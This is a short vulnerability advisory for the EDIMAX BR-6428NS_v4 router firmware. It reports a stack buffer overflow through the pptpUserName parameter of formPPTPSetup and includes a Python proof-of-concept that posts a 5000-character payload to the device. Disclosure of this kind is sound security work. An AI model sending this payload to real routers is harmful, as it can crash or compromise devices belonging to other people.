EDIMAX-BR-6428NS-formPPTPSetup

Overview

The device's official website: https://www.edimax.com/edimax/download/download/data/edimax/global/download/wireless_routers_n300/br-6428ns_v4

Affected version

BR-6428NS_v4_1.10

Vulnerability details

The EDIMAX BR-6428NS_v4_1.10 firmware has a stack overflow vulnerability in the formPPTPSetup function. The v22 variable receives the pptpUserName parameter from a POST request. However, since the user can control the input of pptpUserName, the statement strcat() can cause a buffer overflow.

POC

import requests

ip = "192.168.2.1"

payload = "A"*5000
data = {
    "submit-url": "",
    "pptpConnect": "",
    "pptpDisconnect": "",
    "pptpIpMode": "0",
    "HostName": "test",
    "macAddr": "",
    "pptpGateway": "",
    "enableDuallAccess": "",
    "DUAL_WAN_IGMP": "",
    "httpProxyEnable": "",
    "DNSMode": "1",
    "dns1": "1.1.1.1",
    "dns2": "8.8.8.8",
    "dns3": "",
    "pptpUserName": payload
}

url = f'http://{ip}/goform/formPPTPSetup'

res = requests.post(url=url, data=data, verify=False)
print(res)